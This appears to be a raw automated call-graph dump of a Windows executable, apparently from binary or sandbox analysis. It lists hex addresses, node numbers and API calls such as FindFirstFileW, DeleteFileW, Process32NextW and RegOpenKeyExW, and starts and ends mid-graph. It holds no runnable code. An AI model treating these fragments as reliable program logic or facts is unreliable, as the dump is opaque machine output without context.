96856->96807 96858 6f7e1a 96857->96858 96859 71014b 8 API calls 96858->96859 96860 6f7e28 96859->96860 96913 6f8445 96860->96913 96863 6f8470 96916 6fc760 96863->96916 96865 6f8480 96866 71017b 8 API calls 96865->96866 96867 6f851c 96865->96867 96866->96867 96867->96820 96868 701ca0 8 API calls 96867->96868 96868->96815 96869->96820 96870->96820 96871->96820 96872->96792 96873->96820 96875 6fc2dc 96874->96875 96879 6fc2d9 __fread_nolock 96874->96879 96876 71014b 8 API calls 96875->96876 96877 6fc2e7 96876->96877 96878 71017b 8 API calls 96877->96878 96878->96879 96879->96824 96881 759825 _wcslen 96880->96881 96882 759914 96881->96882 96885 75985a 96881->96885 96886 759919 96881->96886 96882->96833 96887 6fbf73 96882->96887 96885->96882 96909 70e36b 41 API calls 96885->96909 96886->96882 96910 70e36b 41 API calls 96886->96910 96888 71017b 8 API calls 96887->96888 96889 6fbf88 96888->96889 96890 71014b 8 API calls 96889->96890 96891 6fbf96 96890->96891 96892 6facc0 96891->96892 96893 6faccf 96892->96893 96895 6face1 96892->96895 96894 6fc2c9 8 API calls 96893->96894 96901 6facda __fread_nolock 96893->96901 96896 7405a3 __fread_nolock 96894->96896 96895->96893 96897 740557 96895->96897 96898 6fad07 96895->96898 96900 71014b 8 API calls 96897->96900 96911 6f88e8 8 API calls 96898->96911 96902 740561 96900->96902 96901->96831 96903 71017b 8 API calls 96902->96903 96903->96893 96905 6fae02 96904->96905 96906 6fae0b __fread_nolock 96904->96906 96905->96906 96907 6fc2c9 8 API calls 96905->96907 96906->96833 96906->96906 96907->96906 96908->96834 96909->96885 96910->96886 96911->96901 96912->96848 96914 71014b 8 API calls 96913->96914 96915 6f7e30 96914->96915 96915->96863 96917 6fc76b 96916->96917 96918 741285 96917->96918 96923 6fc773 ISource 96917->96923 96919 71014b 8 API calls 96918->96919 96920 741291 96919->96920 96921 6fc77a 96921->96865 96923->96921 96924 6fc7e0 8 API calls ISource 96923->96924 96924->96923 96935 75e80e 96925->96935 96927 75ddd4 Process32NextW 96928 75de86 CloseHandle 96927->96928 96934 75ddcd 96927->96934 96928->96641 96929 6fbf73 8 API calls 96929->96934 96930 6fb329 8 API calls 96930->96934 96934->96927 96934->96928 96934->96929 96934->96930 96941 6f568e 96934->96941 96983 6f7bb5 96934->96983 96992 70e36b 41 API calls 96934->96992 96936 75e819 96935->96936 96937 75e830 96936->96937 96940 75e836 96936->96940 96993 716722 GetStringTypeW 96936->96993 96994 71666b 39 API calls 96937->96994 96940->96934 96942 6fbf73 8 API calls 96941->96942 96943 6f56a4 96942->96943 96944 6fbf73 8 API calls 96943->96944 96945 6f56ac 96944->96945 96946 6fbf73 8 API calls 96945->96946 96947 6f56b4 96946->96947 96948 6fbf73 8 API calls 96947->96948 96949 6f56bc 96948->96949 96950 734da1 96949->96950 96951 6f56f0 96949->96951 96952 6fbed9 8 API calls 96950->96952 96953 6facc0 8 API calls 96951->96953 96954 734daa 96952->96954 96955 6f56fe 96953->96955 96998 6fbd57 96954->96998 96957 6fadf4 8 API calls 96955->96957 96958 6f5708 96957->96958 96959 6facc0 8 API calls 96958->96959 96961 6f5733 96958->96961 96962 6f5729 96959->96962 96960 6f5778 96964 6facc0 8 API calls 96960->96964 96961->96960 96963 6f5754 96961->96963 96969 734dcc 96961->96969 96966 6fadf4 8 API calls 96962->96966 96963->96960 96995 6f655e 96963->96995 96965 6f5789 96964->96965 96967 6f579f 96965->96967 96973 6fbed9 8 API calls 96965->96973 96966->96961 96970 6f57b3 96967->96970 96975 6fbed9 8 API calls 96967->96975 97004 6f8577 96969->97004 96974 6f57be 96970->96974 96977 6fbed9 8 API calls 96970->96977 96973->96967 96978 6fbed9 8 API calls 96974->96978 96980 6f57c9 96974->96980 96975->96970 96976 6facc0 8 API calls 96976->96960 96977->96974 96978->96980 96979 734e8c 96979->96960 96981 6f655e 8 API calls 96979->96981 97016 6fad40 8 API calls __fread_nolock 96979->97016 96980->96934 96981->96979 96984 6f7bc7 96983->96984 96985 73641d 96983->96985 97018 6f7bd8 96984->97018 97028 7513c8 8 API calls __fread_nolock 96985->97028 96988 6f7bd3 96988->96934 96989 736427 96990 736433 96989->96990 96991 6fbed9 8 API calls 96989->96991 96991->96990 96992->96934 96993->96936 96994->96940 96996 6fc2c9 8 API calls 96995->96996 96997 6f5761 96996->96997 96997->96960 96997->96976 96999 6fbd64 96998->96999 97000 6fbd71 96998->97000 96999->96961 97001 71014b 8 API calls 97000->97001 97002 6fbd7b 97001->97002 97003 71017b 8 API calls 97002->97003 97003->96999 97005 736610 97004->97005 97006 6f8587 _wcslen 97004->97006 97007 6fadf4 8 API calls 97005->97007 97009 6f859d 97006->97009 97010 6f85c2 97006->97010 97008 736619 97007->97008 97008->97008 97017 6f88e8 8 API calls 97009->97017 97012 71014b 8 API calls 97010->97012 97014 6f85ce 97012->97014 97013 6f85a5 __fread_nolock 97013->96979 97015 71017b 8 API calls 97014->97015 97015->97013 97016->96979 97017->97013 97019 6f7c1b __fread_nolock 97018->97019 97020 6f7be7 97018->97020 97019->96988 97020->97019 97021 73644e 97020->97021 97022 6f7c0e 97020->97022 97023 71014b 8 API calls 97021->97023 97029 6f7d74 97022->97029 97025 73645d 97023->97025 97026 71017b 8 API calls 97025->97026 97027 736491 __fread_nolock 97026->97027 97028->96989 97030 6f7d8a 97029->97030 97033 6f7d85 __fread_nolock 97029->97033 97031 736528 97030->97031 97032 71017b 8 API calls 97030->97032 97032->97033 97033->97019 97068 7602aa 97034->97068 97037 7603f3 97084 7605e9 56 API calls __fread_nolock 97037->97084 97039 760471 97041 760507 97039->97041 97042 7604a1 97039->97042 97059 760399 __fread_nolock 97039->97059 97040 76040b 97040->97039 97043 76041b 97040->97043 97047 7605b0 97041->97047 97048 760510 97041->97048 97045 7604a6 97042->97045 97046 7604d1 97042->97046 97044 760453 97043->97044 97085 762855 10 API calls 97043->97085 97075 761844 97044->97075 97045->97059 97088 6fca5b 39 API calls 97045->97088 97046->97059 97089 6fca5b 39 API calls 97046->97089 97047->97059 97093 6fc63f 39 API calls 97047->97093 97049 760515 97048->97049 97050 76058d 97048->97050 97052 760554 97049->97052 97053 76051b 97049->97053 97050->97059 97092 6fc63f 39 API calls 97050->97092 97052->97059 97091 6fc63f 39 API calls 97052->97091 97053->97059 97090 6fc63f 39 API calls 97053->97090 97059->96649 97061 760427 97086 762855 10 API calls 97061->97086 97064 76043e __fread_nolock 97087 762855 10 API calls 97064->97087 97066->96647 97067->96646 97069 7602f7 97068->97069 97071 7602bb 97068->97071 97104 6fc98d 39 API calls 97069->97104 97072 7602f5 97071->97072 97073 6f8ec0 52 API calls 97071->97073 97094 714d98 97071->97094 97072->97037 97072->97040 97072->97059 97073->97071 97076 76184f 97075->97076 97077 71014b 8 API calls 97076->97077 97078 761856 97077->97078 97079 761862 97078->97079 97080 761883 97078->97080 97081 71017b 8 API calls 97079->97081 97082 71017b 8 API calls 97080->97082 97083 76186b ___scrt_fastfail 97081->97083 97082->97083 97083->97059 97084->97059 97085->97061 97086->97064 97087->97044 97088->97059 97089->97059 97090->97059 97091->97059 97092->97059 97093->97059 97095 714da6 97094->97095 97096 714e1b 97094->97096 97103 714dcb 97095->97103 97105 71f649 20 API calls __dosmaperr 97095->97105 97107 714e2d 40 API calls 3 library calls 97096->97107 97098 714e28 97098->97071 97100 714db2 97106 722b5c 26 API calls pre_c_initialization 97100->97106 97102 714dbd 97102->97071 97103->97071 97104->97072 97105->97100 97106->97102 97107->97098 97108->96651 97109->96656 97111 71014b 8 API calls 97110->97111 97112 6f424e 97111->97112 97112->96663 97113->96666 97115 6fbf73 8 API calls 97114->97115 97116 75dc73 97115->97116 97117 6fbf73 8 API calls 97116->97117 97118 75dc7c 97117->97118 97119 6fbf73 8 API calls 97118->97119 97120 75dc85 97119->97120 97138 6f5851 97120->97138 97125 75dcab 97126 6f568e 8 API calls 97125->97126 97128 75dcbf FindFirstFileW 97126->97128 97127 6f6b7c 8 API calls 97127->97125 97129 75dd4b FindClose 97128->97129 97132 75dcde 97128->97132 97134 75dd56 97129->97134 97130 75dd26 FindNextFileW 97130->97132 97131 6fbed9 8 API calls 97131->97132 97132->97129 97132->97130 97132->97131 97133 6f7bb5 8 API calls 97132->97133 97150 6f6b7c 97132->97150 97133->97132 97134->96671 97137 75dd42 FindClose 97137->97134 97159 7322d0 97138->97159 97141 6f587d 97143 6f8577 8 API calls 97141->97143 97142 6f5898 97144 6fbd57 8 API calls 97142->97144 97145 6f5889 97143->97145 97144->97145 97161 6f55dc 97145->97161 97148 75eab0 GetFileAttributesW 97149 75dc99 97148->97149 97149->97125 97149->97127 97151 6f6b93 97150->97151 97152 7357fe 97150->97152 97165 6f6ba4 97151->97165 97154 71014b 8 API calls 97152->97154 97156 735808 _wcslen 97154->97156 97155 6f6b9e DeleteFileW 97155->97130 97155->97137 97157 71017b 8 API calls 97156->97157 97158 735841 __fread_nolock 97157->97158 97160 6f585e GetFullPathNameW 97159->97160 97160->97141 97160->97142 97162 6f55ea 97161->97162 97163 6fadf4 8 API calls 97162->97163 97164 6f55fe 97163->97164 97164->97148 97166 6f6bb4 _wcslen 97165->97166 97167 735860 97166->97167 97168 6f6bc7 97166->97168 97169 71014b 8 API calls 97167->97169 97170 6f7d74 8 API calls 97168->97170 97172 73586a 97169->97172 97171 6f6bd4 __fread_nolock 97170->97171 97171->97155 97173 71017b 8 API calls 97172->97173 97174 73589a __fread_nolock 97173->97174 97176 71017b 8 API calls 97175->97176 97177 70c209 97176->97177 97178 71014b 8 API calls 97177->97178 97179 70c215 97178->97179 97179->96683 97181 70fa35 97180->97181 97182 70f9fe 97180->97182 97191 70fe8a 8 API calls 97181->97191 97184 71017b 8 API calls 97182->97184 97185 70fa05 WideCharToMultiByte 97184->97185 97190 70fa3e 8 API calls __fread_nolock 97185->97190 97187 70fa29 97187->96687 97188->96680 97189->96684 97190->97187 97191->97187 97193 6f3996 ___scrt_fastfail 97192->97193 97214 6f5f32 97193->97214 97196 6f3a1c 97198 6f3a3a Shell_NotifyIconW 97196->97198 97199 7340cd Shell_NotifyIconW 97196->97199 97218 6f61a9 97198->97218 97201 6f3a50 97201->96714 97203 6f3969 97202->97203 97204 6f3919 ___scrt_fastfail 97202->97204 97203->96714 97205 6f3938 Shell_NotifyIconW 97204->97205 97205->97203 97206->96714 97208 71017b 8 API calls 97207->97208 97209 6f7afa 97208->97209 97210 71014b 8 API calls 97209->97210 97211 6f7b08 97210->97211 97211->96714 97212->96714 97213->96714 97215 6f5f4e 97214->97215 97216 6f39eb 97214->97216 97215->97216 97217 735070 DestroyIcon 97215->97217 97216->97196 97248 75d11f 42 API calls 97216->97248 97217->97216 97219 6f61c6 97218->97219 97238 6f62a8 97218->97238 97220 6f7ad5 8 API calls 97219->97220 97221 6f61d4 97220->97221 97222 735278 LoadStringW 97221->97222 97223 6f61e1 97221->97223 97226 735292 97222->97226 97224 6f8577 8 API calls 97223->97224 97225 6f61f6 97224->97225 97227 6f6203 97225->97227 97233 7352ae 97225->97233 97229 6fbed9 8 API calls 97226->97229 97231 6f6229 ___scrt_fastfail 97226->97231 97227->97226 97228 6f620d 97227->97228 97230 6f6b7c 8 API calls 97228->97230 97229->97231 97232 6f621b 97230->97232 97236 6f628e Shell_NotifyIconW 97231->97236 97234 6f7bb5 8 API calls 97232->97234 97233->97231 97235 7352f1 97233->97235 97237 6fbf73 8 API calls 97233->97237 97234->97231 97250 70fe6f 51 API calls 97235->97250 97236->97238 97239 7352d8 97237->97239 97238->97201 97249 75a350 9 API calls 97239->97249 97242 735310 97244 6f6b7c 8 API calls 97242->97244 97243 7352e3 97245 6f7bb5 8 API calls 97243->97245 97246 735321 97244->97246 97245->97235 97247 6f6b7c 8 API calls 97246->97247 97247->97231 97248->97196 97249->97243 97250->97242 97252 7618b6 97251->97252 97253 71014b 8 API calls 97252->97253 97254 7618bd 97253->97254 97257 75fcb5 97254->97257 97256 7618f7 97256->96726 97258 6fc2c9 8 API calls 97257->97258 97259 75fcc8 CharLowerBuffW 97258->97259 97262 75fcdb 97259->97262 97260 6f655e 8 API calls 97260->97262 97261 75fce5 ___scrt_fastfail 97261->97256 97262->97260 97262->97261 97263 75fd19 97262->97263 97264 75fd2b 97263->97264 97265 6f655e 8 API calls 97263->97265 97266 71017b 8 API calls 97264->97266 97265->97264 97270 75fd59 97266->97270 97269 75fdb8 97269->97261 97272 71014b 8 API calls 97269->97272 97271 75fd7b 97270->97271 97290 75fbed 8 API calls 97270->97290 97275 75fe0c 97271->97275 97273 75fdd2 97272->97273 97274 71017b 8 API calls 97273->97274 97274->97261 97276 6fbf73 8 API calls 97275->97276 97277 75fe3e 97276->97277 97278 6fbf73 8 API calls 97277->97278 97279 75fe47 97278->97279 97280 6fbf73 8 API calls 97279->97280 97287 75fe50 97280->97287 97281 760114 97281->97269 97282 6fad40 8 API calls 97282->97287 97283 7166f8 GetStringTypeW 97283->97287 97284 6f8577 8 API calls 97284->97287 97286 75fe0c 40 API calls 97286->97287 97287->97281 97287->97282 97287->97283 97287->97284 97287->97286 97288 716641 39 API calls 97287->97288 97289 6fbed9 8 API calls 97287->97289 97291 716722 GetStringTypeW 97287->97291 97288->97287 97289->97287 97290->97270 97291->97287 97292->96758 97293->96744 97294->96758 97295->96759 97296->96758 97297->96604 97298->96604 97299->96601 97300->96607 97318 6fcf80 97301->97318 97303 6fbfb5 97304 740db6 97303->97304 97305 6fbfc3 97303->97305 97327 6fb4c8 8 API calls 97304->97327 97307 71014b 8 API calls 97305->97307 97308 6fbfd4 97307->97308 97310 6fbf73 8 API calls 97308->97310 97309 740dc1 97311 6fbfde 97310->97311 97312 6fbfed 97311->97312 97313 6fbed9 8 API calls 97311->97313 97314 71014b 8 API calls 97312->97314 97313->97312 97315 6fbff7 97314->97315 97326 6fbe7b 39 API calls 97315->97326 97317 6fc01b 97317->96421 97319 6fd1c7 97318->97319 97324 6fcf93 97318->97324 97319->97303 97321 6fd03d 97321->97303 97322 6fbf73 8 API calls 97322->97324 97324->97321 97324->97322 97328 7105b2 5 API calls __Init_thread_wait 97324->97328 97329 710413 29 API calls __onexit 97324->97329 97330 710568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97324->97330 97326->97317 97327->97309 97328->97324 97329->97324 97330->97324 97331 6f1044 97336 6f2793 97331->97336 97333 6f104a 97372 710413 29 API calls __onexit 97333->97372 97335 6f1054 97373 6f2a38 97336->97373 97340 6f280a 97341 6fbf73 8 API calls 97340->97341 97342 6f2814 97341->97342 97343 6fbf73 8 API calls 97342->97343 97344 6f281e 97343->97344 97345 6fbf73 8 API calls 97344->97345 97346 6f2828 97345->97346 97347 6fbf73 8 API calls 97346->97347 97348 6f2866 97347->97348 97349 6fbf73 8 API calls 97348->97349 97350 6f2932 97349->97350 97383 6f2dbc 97350->97383 97354 6f2964 97355 6fbf73 8 API calls 97354->97355 97356 6f296e 97355->97356 97357 703160 9 API calls 97356->97357 97358 6f2999 97357->97358 97410 6f3166 97358->97410 97360 6f29b5 97361 6f29c5 GetStdHandle 97360->97361 97362 7339e7 97361->97362 97363 6f2a1a 97361->97363 97362->97363 97364 7339f0 97362->97364 97367 6f2a27 OleInitialize 97363->97367 97365 71014b 8 API calls 97364->97365 97366 7339f7 97365->97366 97417 760ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97366->97417 97367->97333 97369 733a00 97418 7612eb CreateThread 97369->97418 97371 733a0c CloseHandle 97371->97363 97372->97335 97419 6f2a91 97373->97419 97376 6f2a91 8 API calls 97377 6f2a70 97376->97377 97378 6fbf73 8 API calls 97377->97378 97379 6f2a7c 97378->97379 97380 6f8577 8 API calls 97379->97380 97381 6f27c9 97380->97381 97382 6f327e 6 API calls 97381->97382 97382->97340 97384 6fbf73 8 API calls 97383->97384 97385 6f2dcc 97384->97385 97386 6fbf73 8 API calls 97385->97386 97387 6f2dd4 97386->97387 97426 6f81d6 97387->97426 97390 6f81d6 8 API calls 97391 6f2de4 97390->97391 97392 6fbf73 8 API calls 97391->97392 97393 6f2def 97392->97393 97394 71014b 8 API calls 97393->97394 97395 6f293c 97394->97395 97396 6f3205 97395->97396 97397 6f3213 97396->97397 97398 6fbf73 8 API calls 97397->97398 97399 6f321e 97398->97399 97400 6fbf73 8 API calls 97399->97400 97401 6f3229 97400->97401 97402 6fbf73 8 API calls 97401->97402 97403 6f3234 97402->97403 97404 6fbf73 8 API calls 97403->97404 97405 6f323f 97404->97405 97406 6f81d6 8 API calls 97405->97406 97407 6f324a 97406->97407 97408 71014b 8 API calls 97407->97408 97409 6f3251 RegisterWindowMessageW 97408->97409 97409->97354 97411 6f3176 97410->97411 97412 733c8f 97410->97412 97413 71014b 8 API calls 97411->97413 97429 763c4e 8 API calls 97412->97429 97415 6f317e 97413->97415 97415->97360 97416 733c9a 97417->97369 97418->97371 97430 7612d1 14 API calls 97418->97430 97420 6fbf73 8 API calls 97419->97420 97421 6f2a9c 97420->97421 97422 6fbf73 8 API calls 97421->97422 97423 6f2aa4 97422->97423 97424 6fbf73 8 API calls 97423->97424 97425 6f2a66 97424->97425 97425->97376 97427 6fbf73 8 API calls 97426->97427 97428 6f2ddc 97427->97428 97428->97390 97429->97416 97431 6ff4c0 97434 70a025 97431->97434 97433 6ff4cc 97435 70a046 97434->97435 97436 70a0a3 97434->97436 97435->97436 97437 700340 207 API calls 97435->97437 97440 70a0e7 97436->97440 97443 763fe1 81 API calls __wsopen_s 97436->97443 97441 70a077 97437->97441 97439 74806b 97439->97439 97440->97433 97441->97436 97441->97440 97442 6fbed9 8 API calls 97441->97442 97442->97436 97443->97439 97444 700ebf 97445 700ed3 97444->97445 97450 701425 97444->97450 97446 700ee5 97445->97446 97447 71014b 8 API calls 97445->97447 97448 74562c 97446->97448 97451 700f3e 97446->97451 97478 6fb4c8 8 API calls 97446->97478 97447->97446 97479 761b14 8 API calls 97448->97479 97450->97446 97454 6fbed9 8 API calls 97450->97454 97453 702b20 207 API calls 97451->97453 97468 70049d ISource 97451->97468 97476 700376 ISource 97453->97476 97454->97446 97455 74632b 97483 763fe1 81 API calls __wsopen_s 97455->97483 97457 701695 97463 6fbed9 8 API calls 97457->97463 97457->97468 97459 6fbed9 8 API calls 97459->97476 97460 745cdb 97467 6fbed9 8 API calls 97460->97467 97460->97468 97461 74625a 97482 763fe1 81 API calls __wsopen_s 97461->97482 97463->97468 97465 7105b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97465->97476 97466 701990 207 API calls 97466->97476 97467->97468 97469 6fbf73 8 API calls 97469->97476 97470 710413 29 API calls pre_c_initialization 97470->97476 97471 746115 97480 763fe1 81 API calls __wsopen_s 97471->97480 97472 700aae ISource 97481 763fe1 81 API calls __wsopen_s 97472->97481 97474 710568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97474->97476 97475 71014b 8 API calls 97475->97476 97476->97455 97476->97457 97476->97459 97476->97460 97476->97461 97476->97465 97476->97466 97476->97468 97476->97469 97476->97470 97476->97471 97476->97472 97476->97474 97476->97475 97477 701e50 40 API calls ISource 97476->97477 97477->97476 97478->97446 97479->97468 97480->97472 97481->97468 97482->97468 97483->97468 97484 728782 97489 72853e 97484->97489 97487 7287aa 97490 72856f try_get_first_available_module 97489->97490 97500 7286b8 97490->97500 97504 71917b 40 API calls 2 library calls 97490->97504 97492 72876e 97508 722b5c 26 API calls pre_c_initialization 97492->97508 97494 7286c3 97494->97487 97501 730d04 97494->97501 97496 72870c 97496->97500 97505 71917b 40 API calls 2 library calls 97496->97505 97498 72872b 97498->97500 97506 71917b 40 API calls 2 library calls 97498->97506 97500->97494 97507 71f649 20 API calls __dosmaperr 97500->97507 97509 730401 97501->97509 97503 730d1f 97503->97487 97504->97496 97505->97498 97506->97500 97507->97492 97508->97494 97512 73040d BuildCatchObjectHelperInternal 97509->97512 97510 73041b 97567 71f649 20 API calls __dosmaperr 97510->97567 97512->97510 97514 730454 97512->97514 97513 730420 97568 722b5c 26 API calls pre_c_initialization 97513->97568 97520 7309db 97514->97520 97519 73042a __fread_nolock 97519->97503 97570 7307af 97520->97570 97523 730a26 97588 725594 97523->97588 97524 730a0d 97602 71f636 20 API calls __dosmaperr 97524->97602 97527 730a2b 97528 730a34 97527->97528 97529 730a4b 97527->97529 97604 71f636 20 API calls __dosmaperr 97528->97604 97601 73071a CreateFileW 97529->97601 97530 730a12 97603 71f649 20 API calls __dosmaperr 97530->97603 97534 730a39 97605 71f649 20 API calls __dosmaperr 97534->97605 97535 730478 97569 7304a1 LeaveCriticalSection __wsopen_s 97535->97569 97537 730b01 GetFileType 97538 730b53 97537->97538 97539 730b0c GetLastError 97537->97539 97610 7254dd 21 API calls 2 library calls 97538->97610 97608 71f613 20 API calls __dosmaperr 97539->97608 97540 730ad6 GetLastError 97607 71f613 20 API calls __dosmaperr 97540->97607 97542 730a84 97542->97537 97542->97540 97606 73071a CreateFileW 97542->97606 97544 730b1a CloseHandle 97544->97530 97546 730b43 97544->97546 97609 71f649 20 API calls __dosmaperr 97546->97609 97548 730ac9 97548->97537 97548->97540 97550 730b74 97552 730bc0 97550->97552 97611 73092b 72 API calls 3 library calls 97550->97611 97551 730b48 97551->97530 97556 730bed 97552->97556 97612 7304cd 72 API calls 3 library calls 97552->97612 97555 730be6 97555->97556 97557 730bfe 97555->97557 97613 728a2e 97556->97613 97557->97535 97559 730c7c CloseHandle 97557->97559 97628 73071a CreateFileW 97559->97628 97561 730ca7 97562 730cdd 97561->97562 97563 730cb1 GetLastError 97561->97563 97562->97535 97629 71f613 20 API calls __dosmaperr 97563->97629 97565 730cbd 97630 7256a6 21 API calls 2 library calls 97565->97630 97567->97513 97568->97519 97569->97519 97571 7307d0 97570->97571 97572 7307ea 97570->97572 97571->97572 97638 71f649 20 API calls __dosmaperr 97571->97638 97631 73073f 97572->97631 97574 730822 97578 730851 97574->97578 97640 71f649 20 API calls __dosmaperr 97574->97640 97576 7307df 97639 722b5c 26 API calls pre_c_initialization 97576->97639 97585 7308a4 97578->97585 97642 71da7d 26 API calls 2 library calls 97578->97642 97581 73089f 97583 73091e 97581->97583 97581->97585 97582 730846 97641 722b5c 26 API calls pre_c_initialization 97582->97641 97643 722b6c 11 API calls _abort 97583->97643 97585->97523 97585->97524 97587 73092a 97589 7255a0 BuildCatchObjectHelperInternal 97588->97589 97646 7232d1 EnterCriticalSection 97589->97646 97591 7255ee 97647 72569d 97591->97647 97592 7255a7 97592->97591 97593 7255cc 97592->97593 97598 72563a EnterCriticalSection 97592->97598 97650 725373 97593->97650 97596 725617 __fread_nolock 97596->97527 97598->97591 97599 725647 LeaveCriticalSection 97598->97599 97599->97592 97601->97542 97602->97530 97603->97535 97604->97534 97605->97530 97606->97548 97607->97530 97608->97544 97609->97551 97610->97550 97611->97552 97612->97555 97614 725737 __wsopen_s 26 API calls 97613->97614 97617 728a3e 97614->97617 97615 728a44 97669 7256a6 21 API calls 2 library calls 97615->97669 97617->97615 97618 728a76 97617->97618 97621 725737 __wsopen_s 26 API calls 97617->97621 97618->97615 97619 725737 __wsopen_s 26 API calls 97618->97619 97622 728a82 CloseHandle 97619->97622 97620 728a9c 97623 728abe 97620->97623 97670 71f613 20 API calls __dosmaperr 97620->97670 97624 728a6d 97621->97624 97622->97615 97625 728a8e GetLastError 97622->97625 97623->97535 97627 725737 __wsopen_s 26 API calls 97624->97627 97625->97615 97627->97618 97628->97561 97629->97565 97630->97562 97632 730757 97631->97632 97633 730772 97632->97633 97644 71f649 20 API calls __dosmaperr 97632->97644 97633->97574 97635 730796 97645 722b5c 26 API calls pre_c_initialization 97635->97645 97637 7307a1 97637->97574 97638->97576 97639->97572 97640->97582 97641->97578 97642->97581 97643->97587 97644->97635 97645->97637 97646->97592 97658 723319 LeaveCriticalSection 97647->97658 97649 7256a4 97649->97596 97659 724ff0 97650->97659 97652 725392 97653 722d38 _free 20 API calls 97652->97653 97655 7253e4 97653->97655 97654 725385 97654->97652 97666 723778 11 API calls 2 library calls 97654->97666 97655->97591 97657 7254ba EnterCriticalSection 97655->97657 97657->97591 97658->97649 97664 724ffd __dosmaperr 97659->97664 97660 72503d 97668 71f649 20 API calls __dosmaperr 97660->97668 97661 725028 RtlAllocateHeap 97662 72503b 97661->97662 97661->97664 97662->97654 97664->97660 97664->97661 97667 71521d 7 API calls 2 library calls 97664->97667 97666->97654 97667->97664 97668->97662 97669->97620 97670->97623 97671 6fdd3d 97673 7419c2 97671->97673 97675 6fdd63 97671->97675 97672 741a46 97680 741a7d 97672->97680 97730 763fe1 81 API calls __wsopen_s 97672->97730 97673->97672 97677 741a82 97673->97677 97682 741a26 97673->97682 97674 6fdead 97679 71017b 8 API calls 97674->97679 97675->97674 97678 71014b 8 API calls 97675->97678 97731 763fe1 81 API calls __wsopen_s 97677->97731 97684 6fdd8d 97678->97684 97689 6fdee4 __fread_nolock 97679->97689 97729 70e6e8 207 API calls 97682->97729 97685 71014b 8 API calls 97684->97685 97684->97689 97686 6fdddb 97685->97686 97686->97682 97688 6fde16 97686->97688 97687 71017b 8 API calls 97687->97689 97690 700340 207 API calls 97688->97690 97689->97672 97689->97687 97691 6fde29 97690->97691 97691->97680 97691->97689 97692 741aa5 97691->97692 97693 6fde77 97691->97693 97695 6fd526 97691->97695 97732 763fe1 81 API calls __wsopen_s 97692->97732 97693->97674 97693->97695 97696 71014b 8 API calls 97695->97696 97697 6fd589 97696->97697 97713 6fc32d 97697->97713 97700 71014b 8 API calls 97705 6fd66e ISource 97700->97705 97704 741f79 97734 7556ae 8 API calls ISource 97704->97734 97705->97704 97706 741f94 97705->97706 97708 6fbed9 8 API calls 97705->97708 97709 6fc3ab 8 API calls 97705->97709 97710 6fd911 ISource 97705->97710 97733 6fb4c8 8 API calls 97705->97733 97708->97705 97709->97705 97711 6fd9ac ISource 97710->97711 97720 6fc3ab 97710->97720 97712 6fd9c3 97711->97712 97728 70e30a 8 API calls ISource 97711->97728 97719 6fc33d 97713->97719 97714 6fc345 97714->97700 97715 71014b 8 API calls 97715->97719 97716 6fbf73 8 API calls 97716->97719 97717 6fbed9 8 API calls 97717->97719 97718 6fc32d 8 API calls 97718->97719 97719->97714 97719->97715 97719->97716 97719->97717 97719->97718 97721 6fc3b9 97720->97721 97727 6fc3e1 ISource 97720->97727 97722 6fc3c7 97721->97722 97723 6fc3ab 8 API calls 97721->97723 97724 6fc3cd 97722->97724 97725 6fc3ab 8 API calls 97722->97725 97723->97722 97724->97727 97735 6fc7e0 8 API calls ISource 97724->97735 97725->97724 97727->97711 97728->97711 97729->97672 97730->97680 97731->97680 97732->97680 97733->97705 97734->97706 97735->97727 97736 6ff4dc 97737 6fcab0 207 API calls 97736->97737 97738 6ff4ea 97737->97738 97739 6f105b 97744 6f52a7 97739->97744 97741 6f106a 97775 710413 29 API calls __onexit 97741->97775 97743 6f1074 97745 6f52b7 __wsopen_s 97744->97745 97746 6fbf73 8 API calls 97745->97746 97747 6f536d 97746->97747 97776 6f5594 97747->97776 97749 6f5376 97783 6f5238 97749->97783 97752 6f6b7c 8 API calls 97753 6f538f 97752->97753 97789 6f6a7c 97753->97789 97756 6fbf73 8 API calls 97757 6f53a7 97756->97757 97758 6fbd57 8 API calls 97757->97758 97759 6f53b0 RegOpenKeyExW 97758->97759 97760 734be6 RegQueryValueExW 97759->97760 97764 6f53d2 97759->97764 97761 734c03 97760->97761 97762 734c7c RegCloseKey 97760->97762 97763 71017b 8 API calls 97761->97763 97762->97764 97774 734c8e _wcslen 97762->97774 97765 734c1c 97763->97765 97764->97741 97766 6f423c 8 API calls 97765->97766 97767 734c27 RegQueryValueExW 97766->97767 97769 734c44 97767->97769 97771 734c5e ISource 97767->97771 97768 6f655e 8 API calls 97768->97774 97770 6f8577 8 API calls 97769->97770 97770->97771 97771->97762 97772 6fb329 8 API calls 97772->97774 97773 6f6a7c 8 API calls 97773->97774 97774->97764 97774->97768 97774->97772 97774->97773 97775->97743 97777 7322d0 __wsopen_s 97776->97777 97778 6f55a1 GetModuleFileNameW 97777->97778 97779 6fb329 8 API calls 97778->97779 97780 6f55c7 97779->97780 97781 6f5851 9 API calls 97780->97781 97782 6f55d1 97781->97782 97782->97749 97784 7322d0 __wsopen_s 97783->97784 97785 6f5245 GetFullPathNameW 97784->97785 97786 6f5267 97785->97786 97787 6f8577 8 API calls 97786->97787 97788 6f5285 97787->97788 97788->97752 97790 6f6a8b 97789->97790 97794 6f6aac __fread_nolock 97789->97794 97792 71017b 8 API calls 97790->97792 97791 71014b 8 API calls 97793 6f539e 97791->97793 97792->97794 97793->97756 97794->97791 97795 6f1098 97800 6f5fc8 97795->97800 97799 6f10a7 97801 6fbf73 8 API calls 97800->97801 97802 6f5fdf GetVersionExW 97801->97802 97803 6f8577 8 API calls 97802->97803 97804 6f602c 97803->97804 97805 6fadf4 8 API calls 97804->97805 97817 6f6062 97804->97817 97806 6f6056 97805->97806 97808 6f55dc 8 API calls 97806->97808 97807 6f611c GetCurrentProcess IsWow64Process 97809 6f6138 97807->97809 97808->97817 97811 735269 GetSystemInfo 97809->97811 97812 6f6150 LoadLibraryA 97809->97812 97810 735224 97813 6f619d GetSystemInfo 97812->97813 97814 6f6161 GetProcAddress 97812->97814 97816 6f6177 97813->97816 97814->97813 97815 6f6171 GetNativeSystemInfo 97814->97815 97815->97816 97818 6f617b FreeLibrary 97816->97818 97819 6f109d 97816->97819 97817->97807 97817->97810 97818->97819 97820 710413 29 API calls __onexit 97819->97820 97820->97799 97821 6f36f5 97824 6f370f 97821->97824 97825 6f3726 97824->97825 97826 6f372b 97825->97826 97827 6f378a 